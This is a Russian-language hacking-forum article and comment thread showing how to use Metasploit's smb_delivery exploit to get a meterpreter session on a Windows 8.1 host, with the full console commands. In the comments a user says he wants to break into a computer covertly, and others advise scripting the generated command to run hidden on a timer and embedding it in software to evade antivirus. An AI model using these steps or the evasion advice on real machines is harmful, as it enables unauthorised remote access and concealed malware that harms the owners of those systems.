Статья Взлом удаленного хоста (SMB Delivery Exploit)

Всем привет! В этой небольшой статье я хочу показать очередной способ получения сессии meterpreter посредством использования Metasploit Framework, а в частности эксплоита, который носит название SMB Delivery Exploit.

upload_2016-11-1_22-52-26.png


В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.102 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.103.

Откроем терминал и запустим Metasploit Framework:

> msfconsole

В консоли фреймворка пишем:

> use exploit/windows/smb/smb_delivery

> set srvport 4444

> set srvhost 192.168.0.102

> exploit

upload_2016-11-1_22-53-15.png


Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:

upload_2016-11-1_22-53-38.png


После успешной отработки команды в консоли Linux видим формирование сессии meterpreter:

upload_2016-11-1_22-53-59.png


Жмем Ctrl+C, и смотрим информацию о текущих сессиях:

> sessions –i

И подключаемся к открытой сессии под номером 1:

> sessions –I 1

upload_2016-11-1_22-54-27.png


В диспетчере задач Windows созданный процесс выглядит так:

upload_2016-11-1_22-55-4.png


Снимаем задачу и сессия погибает:

upload_2016-11-1_22-55-21.png


На этом собственно все. Спасибо за внимание.
 
W

woweb

Перезагрузи систему, и попробуй другой порт, 4445 к примеру.
Щас попробую...я так изучал debian и самс...сцука не давался ни в какую...в итоге одолел...и щас у меня прокси сервер на debian + sams, кстати а не может быть причина что я сижу в данный момент через прокси, а комп за ее пределами...т.е. у меня айпи 192,168,121,77 а у него 192,168,178,97 ну понятно что точки там...лень было переключать клаву.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Щас попробую...я так изучал debian и самс...сцука не давался ни в какую...в итоге одолел...и щас у меня прокси сервер на debian + sams, кстати а не может быть причина что я сижу в данный момент через прокси, а комп за ее пределами...т.е. у меня айпи 192,168,121,77 а у него 192,168,178,97 ну понятно что точки там...лень было переключать клаву.
Ну и в прокси файрволл, все дела... да? Закрытые порты наверное, кроме используемых...
 
W

woweb

Что то не пойму вот это выражение "Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:"
То есть мне теперь нужно сесть за комп который я хочу тайно взломать чтоб запустить в строке команду...
Ну ё-моё, нахрена мне тогда вообща эти мануалы...елси можно подойти и физически все повредить...к примеру толстой проволокой (лом её еще называют)...пару раз стукнуть и все дела...
После двух перезагрузок вот что пишет в скрине... Выделение_010.png
Поначалу просто долго висела потом я решил проверить ссесию...а ее нет
 
W

woweb

Ну и в прокси файрволл, все дела... да? Закрытые порты наверное, кроме используемых...
Ну я ничего не закрывал...если по умолчанию то да...щас попробую минуя прокси...перезагружусь за пределами экрана дфл
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Что то не пойму вот это выражение "Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:"
То есть мне теперь нужно сесть за комп который я хочу тайно взломать чтоб запустить в строке команду...
Ну ё-моё, нахрена мне тогда вообща эти мануалы...елси можно подойти и физически все повредить...к примеру толстой проволокой (лом её еще называют)...пару раз стукнуть и все дела...
После двух перезагрузок вот что пишет в скрине...Посмотреть вложение 7365
Поначалу просто долго висела потом я решил проверить ссесию...а ее нет
Ну напиши программу, какую нить и иль скрипт, скинь на комп поставь время ее запуска, и чтобы она запустила скрытно эту команду в cmd. Нет, блин, такой программы, вломать все, с одноименной кнопкой по центру.
 
  • Нравится
Реакции: Dmitry88
W

woweb

Ну напиши программу, какую нить и иль скрипт, скинь на комп поставь время ее запуска, и чтобы она запустила скрытно эту команду в cmd. Нет, блин, такой программы, вломать все, с одноименной кнопкой по центру.
Накуя мне скидывать на комп что-то, подходить к нему...цель вообще не прикасаяс ко компу залезть в него
 
W

woweb

В общем этот вариант вообще беспонтовый, если тот мануал с кучей команд не работает плсю там задействованы все апи и атакующий и атакуемый...здесь только мы знаем что есть айпи атакуемого...но нигде никуда его не пихаем...то есть стоит в сторонке себе...а мы мозги делаем на своей машине...бля...как можно сломать другую машину копаясь только в своей...ведь по мануалу другой машины вообще в помине нет...только в начале сказано что якобы собирается акаковать что то с айпи таким то...и у все...все остальное происходит на своей машине ни касаясь чего либо другого...
лядно всем удачи...как я понял тут разводилово...
ну не может в три секунды сломаться комп...который даже на атаковался...
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Всем привет.народ если вы ждете программу в которой тыкнул на кнопочку и вы зашли в чужой комп ..то смею вас разочаровать.Здесь обсуждают инструменты пентестинга,люди делятся своим опытом и знаниями в этой области,а вам подавай готовое решения из коробки..Иногда нужно включать голову,что бы применить тот или иной инструмент или связку их.Учите языки программирования ,данный метод легко встраивается в программное обеспечение, а если поставить таймер на сработку, то это усложнит обнаружения многими антивирусами. Vander статья зачетная!!!!
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Всем привет.народ если вы ждете программу в которой тыкнул на кнопочку и вы зашли в чужой комп ..то смею вас разочаровать.Здесь обсуждают инструменты пентестинга,люди делятся своим опытом и знаниями в этой области,а вам подавай готовое решения из коробки..Иногда нужно включать голову,что бы применить тот или иной инструмент или связку их.Учите языки программирования ,данный метод легко встраивается в программное обеспечение, а если поставить таймер на сработку, то это усложнит обнаружения многими антивирусами. Vander статья зачетная!!!!
Да, обмен опытом - это наш главный приоритет. Отзыв очень исчерпывающий, добавить нечего, все так и есть. Спасибо!
 
  • Нравится
Реакции: aveseth и -=S_U_N_Y=-

Enima

Green Team
29.09.2016
13
6
BIT
3
В общем этот вариант вообще беспонтовый, если тот мануал с кучей команд не работает плсю там задействованы все апи и атакующий и атакуемый...здесь только мы знаем что есть айпи атакуемого...но нигде никуда его не пихаем...то есть стоит в сторонке себе...а мы мозги делаем на своей машине...бля...как можно сломать другую машину копаясь только в своей...ведь по мануалу другой машины вообще в помине нет...только в начале сказано что якобы собирается акаковать что то с айпи таким то...и у все...все остальное происходит на своей машине ни касаясь чего либо другого...
лядно всем удачи...как я понял тут разводилово...
ну не может в три секунды сломаться комп...который даже на атаковался...
Мда.... товарищь вам наверное лучше набрать в яндексе "Программы для хакера" вот там как раз полно выдаст отличных программ с кнопкой "ВЗЛОМ" =) еще кстати есть сайты с кнопочкой ЗАРАБАТЫВАТЬ ДЕНЬГИ! и прям счетчик крутится с бабками))) рекомендую!
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Мда.... товарищь вам наверное лучше набрать в яндексе "Программы для хакера" вот там как раз полно выдаст отличных программ с кнопкой "ВЗЛОМ" =) еще кстати есть сайты с кнопочкой ЗАРАБАТЫВАТЬ ДЕНЬГИ! и прям счетчик крутится с бабками))) рекомендую!
:D
 
W

woweb

Мда.... товарищь вам наверное лучше набрать в яндексе "Программы для хакера" вот там как раз полно выдаст отличных программ с кнопкой "ВЗЛОМ" =) еще кстати есть сайты с кнопочкой ЗАРАБАТЫВАТЬ ДЕНЬГИ! и прям счетчик крутится с бабками))) рекомендую!
Совет самый дешевый товар в мире...тем более у тебя я его и не спрашивал...так что воспользуйстя своим сокровенным знанием заработывать копейки сам...
А так всем кто адекватно ответил благодарен...
kot-gor (у) тебе жму руку...если есть возможность поделиться инфой или какой книгой буду признателен!
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!